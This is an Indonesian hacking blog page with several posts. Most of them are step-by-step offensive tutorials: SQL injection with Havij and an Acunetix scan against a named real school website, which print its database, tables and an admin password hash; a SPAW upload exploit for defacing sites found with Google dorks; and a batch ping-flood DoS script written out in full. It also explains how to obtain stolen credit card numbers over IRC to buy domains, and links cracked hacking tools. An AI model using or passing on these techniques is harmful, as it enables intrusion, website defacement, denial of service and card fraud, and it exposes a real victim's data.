Genzo newbie just share =) Genzo noob just share: Maret 2013
selamat datang di blog tutorial saya ,blog ini di buat sederhana untuk memudahkan anda dalam membaca dan belajar :D .keep calm and enjoy =) . /yusufgenzo

15 cara mendeface website

Selamat sore sobat WarcoPS Cyber semuanya!!! Kali ini saya akan share tentang Jenis-jenis hack / deface website, cara ini kurang lebih berjumlah 15 cara. Kita akan melihat deskripsi dari cara ini, siapa tahu ada website seseorang yang di deface atau di hack dengan salah satu cara berikut ini. Cara ini hanyalah bermaksud untuk sekedar ilmu pengetahuan saja dan tidak mengajari sobat untuk berbuat yang negatif dan menyimpang dari sisi hukum negara Indonesia. Bagi sobat yang belum mengetahui arti deface website, mari saya beri tahu terlebih dahulu. Deface adalah adalah kegiatan mengubah halaman website orang lain tanpa sepengetahuanorang tersebut pastilanya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergraditti yaitu corat-coret website tertentu. Deface itu dilakukan dengan memanfaatkan kelemahan dari website tersebut. Oke sobb... bagi yang ingin tahu jenis deface website bisa langsung baca postingan di bawah ini...


15 Jenis Cara Hack / Deface Website 
 
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks


Yang tadi itu cuma jenis-jenisnya doang sobb... Sekarang akan saya berikan deskripsinya satu persatu.

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker "mengakali" packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar "memberitahu" password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks
 
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

Nah gimana sobbb... sudah tahu kan sekarang berbagai cara men-deface website. Saya harap menjadi ilmu pengetahuan dan tidak menjadi hal yang salah kaprah dalam dunia teknologi yang canggih.

Cara Menggunakan Havij simple

Masuk ke havij gunakan alamat yang kita serang tadi bisa menggunakan

hilangkan tanda – untuk yang pertama dan ‘ untuk yang kedua dan tampak seperti di gambar untuk sql injection menggunakan havij
Lalu setelah memasukan web url klik analyze tunggu sampai selesai.
Setelah selesai anda buka menu info dan klik get dan tunggu hingga selesai, jika
selesai maka informasi yang kita dapatkan adalah
Target: http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
Host IP: 49.156.21.35
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 128 ms
Current User: smpn18bk_userdb@localhost
Sql Version: 5.0.96-community
Current DB: smpn18bk_dbase
System User: smpn18bk_userdb@localhost
Host Name: pasai.magnethost.asia
Installation dir: /
DB User: 'smpn18bk_userdb'@'localhost'
Data Bases: information_schema
smpn18bk_dbase
Data Bases: information_schema
smpn18bk_dbase
Selanjutnya adalah klik tables untuk mendapatkan informasi dari database
smpn18bk_dbase
Pertama-tama adalah klik get dbs untuk mendapatkan nama database, selanjutnya
adalah Untuk mencari tables anda centang table smpn18bk_base klik get tables
setelah itu maka akan muncul tables lebih detail lihat gambar.
Hasil keseluruhan isi database :
siswa
profil
pengumuman
pegawai_str
nilai
mapel
kelas
kategori_galeri
kategori_berita
kaldik
guru_staf
galeri
bukutamu
berita
agenda
admin
Setelah itu kita centang tables admin lalu klik get coloums untuk mendapatkan
username, password, id dan setelah itu akan muncul password dalam bentuk md5,
username, id centang semua dan klik get data.
Hasil dari gambar dump tables admin tersebut dari havij
Dan dapat hasil sebagai berikut
Username : admin
Password dalam bentuk md5 : 25f9e794323b453885f5181f1b624d0b

Software Hacker simple


1 Acunetix
Acunetix merupakan sebuah program alat scaning website yang sangat popular di dunia hacking. Kemampuannya untuk menscan secara total dari sebuah system dan mendapatkan sebuah informasi secara mendetail. Acunetix ini juga bisa mendeteksi kelemahan pada system aplikasi pada website, seperti vuln pada SQL Blind, SQL Injection, Cross Sire Scripting (XSS). Dan dari acunetix ini mampu melihat isi directori dari sebuah website dan bisa di gunakan untuk mencari halaman login website tertentu. Kemampuannya yang begitu lengkap acunetix menjadi salah satu software favorite dari para hacker saat ini. Saat ini acunetix sudah mencapai versi 8 dan dapat di gunakan di windows xp, vista, 7 dan windows 8. Download : http://www.4shared.com/rar/nlFJj71b/Acunetix.html


2 John The Ripper
John The Ripper merupakan salah satu alat hack paling popular dan paling lama yang bertahan sampai saat ini. John di gunakan untuk mencrack sebuah password yang sudah di descyript dari md5 hash, md4, dan password binary lainnya menjadi password login bisaa. Namun untuk menjalankan John anda perlu selalu meng-update source list password directory agar saat mendescyript password terbantu dengan cepat namun john dapat membaca cepat anatar 1-7 password dalam hitungan menit. Namun jika password tersebut lebih dari 7 karakter dan karakter tersebut terdiri dari beberapa symbol, John akan lama membacannya butuh waktu berjam-jam bahkan berhari-hari. Download : http://www.4shared.com/zip/uvg9GqSx/John_The_Ripper.html


3 Havij 1.15 Pro
Havij 1.15 Pro merupakan alat pembaca isi dari daleman suatu database dengan havij kita bisa mendapatkan informasi database baik itu menggunakan sql, oracle, ms access, postgre sql, sybase. Havij sendiri memang tools hacking yang simple dan mudah di gunakan, selain itu di havij mempunyai fitur simpan yang di gunakan untuk penyimpanan dump sql yang kita dapatkan dari proses hacking. Download : http://www.4shared.com/rar/VNv0xeAv/Havij_115_ProCrack.html


4 Admin Finder versi Network Security
Admin finder berfungsi untuk menemukan suatu halaman login dari sebuah website. Admin finder ini telah di modifikasi dan sudah ada tambahan source list halaman login dari sebuah website baik itu menggunakan php, asp, cfm. Tools ini memang cepat dalam melakukan scaning web login pada suatu web. Download : http://www.4shared.com/rar/qiOrYXaS/Admin.html


5 Active Perl
Active perl bahasa pemograman yang cukup popular saat ini, bahasa pemograman ini banyak di kembangkan untuk pembuatan tools-tools security dan tools hacking. Download : http://www.activestate.com/activeperl/downloads


6 Perl
Perl ini sama seperti active perl hanya saja perl ini untuk menjalankan programprogram yang berekstensi .pl seperti adminfinder.pl. Selain itu perl ini anda bisa membuat pemograman yang berbasis pemograman perl. Download : http://www.activestate.com/activeperl/downloads

Cara menggunakan acunetix

jika anda ingin menguji sebuah keamanan webste maka ini yang diperlukan
Masuk ke acunetix lalu masukan nama website seperti contoh di bawah ini :

Masukan nama websitenya (web Target http://smpn18bkl.sch.id) pada kolom website url, seperti gambar di atas dan lalu selanjutnya pilih tombol next.

Selanjutnya akan tampil gambar seperti di bawah ini :

Biarkan sajah defaultnya seperti itu, lalu klik tombol next.

Selanjutnya adalah informasi target korban seperti server, operating system, web server, pemograman technologies yang di gunakan oleh korban akan terekam di sini :

Lalu klik tombol next.

Tampilan selanjutnya adalah informasi login biarkan sajah default seperti bawaan:

Lalu pilih tombol next.

Jika sudah akan muncul tampilan finish dan siap melalukan scanning di acunetix dan biarkan acunetix men-scan website korban hingga selesai. Untuk additional host dectected biarkan sajah, bila ada subdomain dari web utama misalnya http://a.smpn18bkl.sch.id bisa anda centang, berhubung dari website korban tidak mempunyai sub domain anda biarkan sajah.

Selanjutnya pilih tombol finish.

Selanjutnya dari data korban kita menangkap adanya sebuah vuln blind sql yang dapat kita serang kita menemukan http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'Tampak gambar


Lalu kita dapatkan dari hasil scanner menggunakan acunetix

Pada awalnya yang mempunyai blind sql injection adalah pada website http://smpn18bkl.sch.id/berita.php?id=-1Lihat seperti pada gambar di atas. (*) Catatan : Bagi anda yang menemukan web lain yang bertuliskan "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near" berate website tersebut bisa di dump dengan havij. Dari hasil scanning di atas dapat di simpulkan bahwa website tersebut memunyai banyak celah untuk di trobos systemnya termasuk dengan sql injection dan juga xss.

INGATLAH SEMUA ILMU ITU BERGUNA TERGANTUNG BAGAIMANA CARA ANDA MENGGUNAKANNYA

anda bisa bisa bergabung di sini untuk berbagi ilmu

Cara Mendapatkan CC Gratis Untuk Beli Domain

Hey hey hey ketemu gw lagi..
Udah pada tau kan? apa itu intuit? wakaka korban order domain :p
Kali ini bukan make ByPass atau make CC dari cyberbaghost
Kali ini CCnya nyari sendiri di IRC (lebih mantap),

Ok sip kita simak aja tutorial berikut :

- Anda harus mempunyai mIRC (Internet Relay Chat) // Download Disini
- Silahkan anda konek ke server irc.under-unix.com dengan cara :




/s irc.under-unix.com 

- Tunggu 300 Detik untuk melakukan Registrasi ID.
- Jika sudah 300 detik lakukan register ID dengan cara.







/msg NickServ register password e-mail

- Setelah anda Register anda akan mendapat  passcode
- Masukan passcode dengan cara :






/msg NickServ PROCEED passcode anda

  Contoh : /msg NickServ PROCEED 6dj388aj3

- Jika sudah, Join ke channel #unix



 dengan cara menuliskan  /j #unix  

- Tunggu sampai ada yang share CCnya.
- Kalo udah register, bisa login disini
- Dan gunakan untuk order domain di Intuit.

NB : 

- CC disini tidak hanya untuk order domain di Intuit, bisa di gunakan untuk keperluan lainnya,, ada pertanyaan? bisa komentar.
- Untuk menghindari Suspends dari pihak intuit, saya harap 1 CC digunakan untuk order 1 domain.

Auto Hide IP v5.1.8.2

Buat yang takut ketangkep sama satpol :D hehehhe ya udah deh gue lagi cape ngetik :D
Browsing di Internet menjadi lebih dan lebih berbahaya di dunia saat ini. Hacker dan pencuri identitas mencoba untuk menggunakan alamat IP Anda untuk mendapatkan informasi dari anda: alamat rumah, informasi kartu kredit, informasi jaminan sosial, rekening bank Anda dan informasi pribadi lainnya.

Auto Hide IP adalah perlindungan privasi-perangkat lunak yang memungkinkan Anda untuk menyembunyikan alamat IP asli Anda, surfing anonim, dan secara otomatis mengubah alamat IP setiap beberapa menit.

Dengan itu, Anda dapat memilih alamat IP palsu dari berbagai negara melalui pilihan “Pilih Negara IP” dan dapat Periksa IP langsung. Hal ini memungkinkan Anda untuk menyembunyikan identitas online Anda dengan menunjukkan alamat IP palsu, menghalangi hacker dan mencongkel mata dari pemantauan Anda. Anda juga dapat memilih “Peluncuran pada Startup” dan kemudian akan berjalan dan beban alamat IP palsu secara otomatis saat Anda log on ke Windows. Selain itu, Anda dapat dengan mudah beralih di antara IP palsu dan IP nyata, semua dengan mengklik tombol.

Auto Hide IP bekerja dengan Internet Explorer, Firefox, Opera, Maxthon, MyIE dan kompatibel dengan semua jenis router, firewall, jaringan rumah, jaringan nirkabel dan jenis lain dari Internet.

Key Features Fitur Utama

* Anonymous Web Surfing

Tetapkan alamat IP palsu Anda dan waspada terhadap hacker yang akan tertipu oleh IP palsu Anda bukan yang asli Anda.

* Lindungi Identitas Anda

Menyembunyikan IP asli Anda ketika berselancar web untuk mencegah hacker atau pencuri identitas dari pemantauan aktivitas Web Anda atau mencuri informasi pribadi Anda seperti informasi keuangan Anda.

* Pilih Negara IP

Anda memutuskan untuk menggunakan IP palsu dari berbagai negara melalui “Pilih Negara IP” pilihan dan Anda dapat memeriksa IP saat ini secara langsung.

* Kirim Email Anonymous

Sembunyikan alamat IP asli Anda dalam header email. Dilindungi dalam email pengirim dari Yahoo, Hot-mail, Gmail, dll

* Un-ban Diri dari Forum dan Message Boards

Gunakan Auto Sembunyikan IP untuk mengubah IP Anda yang memungkinkan Anda untuk mengakses setiap forum atau website terbatas yang telah melarang Anda.

 buat yang mau download silahkan.
Link Download : 
Click Here

Exploit Scanner

Buat yang mau cari web vuln instan bisa pake ini tools…
ini sangat sederhana kok, pasti semua sudah bisa make,  mungkin dari kalian semuanya sudah ada yang make.

langsung aja gan .






masukin dork andalan kk semuanya, pilih domain favorit, spt .il .ch .us .ru .id

untuk make domain .my dan masih banyak lg pilihan domainnya

kalo sudah keluar web yang vuln, bisa langsung di hajarbreakpc, kalo masih males hajar manual, bisa lanjutin pake tool havij….

mudahkan…semoga berguna
:D
Link Download 1 : 
Click HereLink Download 2 : Click Here

Cara Deface Website Melalui Spaw Uploads Vulnerability

Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

3). Ganti pada Bagian 
/spaw2/uploads/files/ dengan kode dibawah ini :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Sehingga Menjadi Seperti Ini :
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

4).
Tekan Enter, Nanti akan Terbuka Seperti Ini :

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

6). 
Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

7). Selanjutnya Klik Tombol Upload.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

INGTATLAH PESAN SAYA : SEMUA ILMU ITU BERGUNA TERGANTUNG BAGAIMANA ANDA MENGGUNAKANNYA

Cara Membuat DDoS Sederhana dari Notepad

DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.

Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.

1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad

2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)


INGATLAH PESAN SAYA : SEMUA ILMU ITU BERGUNA TERGANTUNG BAGAIMANA ANDA MENGGUNAKANNYA

Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui

Sobat mau belajar tentang hacking? Nah kalo sobat mau belajar tentang ilmu yang satu ini, Sobat perlu mengenal dan mengetahui Istilah-Istilah dalam Dunia Hacking agar sobat tidak bingung ketika mempelajari dunia hacking itu sendiri.

http://cirebon-cyber4rt.blogspot.com/2012/07/istilah-istilah-dalam-dunia-hacking.html

Berikut Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui :

1). Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

2). Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.

3). Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

4). RFI
-> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.

5). LFI
-> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).

6). SQL Injection
-> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

7). DDoS
-> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.

8). Shell
-> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.

9). Deface
-> Merubah tampilan halman suatu website secara paksa dan illegal.

10). Debug
-> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

11). XSS
-> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

12). Phising
-> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

13). Keylogger
-> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

14). Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

15). Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

16). Malicious Code/Script
-> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17). Virus
-> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

18). Worm
-> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

19). Trojan
-> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

20). Backdoor
-> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Sebetulnya istilah-istilah dalam dunia hacking itu banyak, tapi hanya 20 point saja yang saya tulis disini, dan untuk istilah hacking lainnya, sobat bisa cari digoogle. Sekian postingan saya kali ini tentang Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui, kurang lebihnya saya mohon maaf, wassalam :)

MEMBUAT ROBOT AUTO LIKE + AUTO COMMENT DI FACEBOOK

Kali Ini saya akan share cara membuat robot auto comment + auto like di facebook ,

nih caranya pertama kamu daftar dulu di hosting gratis / premium kamu

nih contoh daftar disini pilih aja salah satu :

http://idhostinger.com
http://nazuka.net
http://1freehosting.com
http://dzihost.com
atau hosting2 yang lain

NIH CARANYA

Pertama kita harus punya hostingan dengan fitur "Cron Job" untuk mengeksekusi bot secara otomatis. Di sini saya pakai hostingan gratis dari IdHostinger atau kalian bisa pke hostingan laen yg support "Cron Job"


Jika kamu menggunakan KOMPUTER maka  untuk mendapatkan acces token


Kalau kamu menggunakan HP  untuk mendapatkan acces token.


Setelah di klik link di atas, kamu akan di minta izin oleh aplikasi tsb, klik "Pasang" lalu "Izinkan" setelah itu kamu akan di bawa ke beranda facebook, lihat pada addressbar dan ambil access tokennya saja. Lihat contoh di bawah ini


CONTOH AKSES TOKEN KU  :

facebook.com/#access_token=AAAETwbyOc4EBAOMJ 91Ign6sFBc4fElmItMZCBy6aXNMOUKZC FR1dTT0yZCGLsa7jO5P46QWCMZA557 RkN9W9hASDade9l37W83XmQZDZD&expires_in=0



salin dan simpan access token tadi di notepad atau apalah bebas.yang berwarna hijau saja yang di salin kyk contoh di atas



INGAT YANG DIGANTI HANYA AKSES TOKENNYA SAJA CARI TULISAN ''Masukkan akses token mu di antara tanda kutip'' LIHAT DI SEBELAH KIRI ADA TANDA KUTIP MASUKAN DISANA .






LIHAT GAMBAR




kalau udah upload php kamu di hosting
buka http://www.idhostinger.com/

daftar atau register sampe beres sampe muncul


Pilih "Kontrol Panel", lalu klik tombol "Beralih"

cari link File Manajer 1


buka dulu public_html lalu kita upload di public_html





upload  file SCRIPT NYA HENDRO.PHP tadi yang udah di masukan tokennya
cara masukin token liat

atau yg 1 lagi



kalau udah upload


beres upload...

lalu kita ke

"Kontrol Panel", lalu klik tombol "Beralih"


cari Cronjob


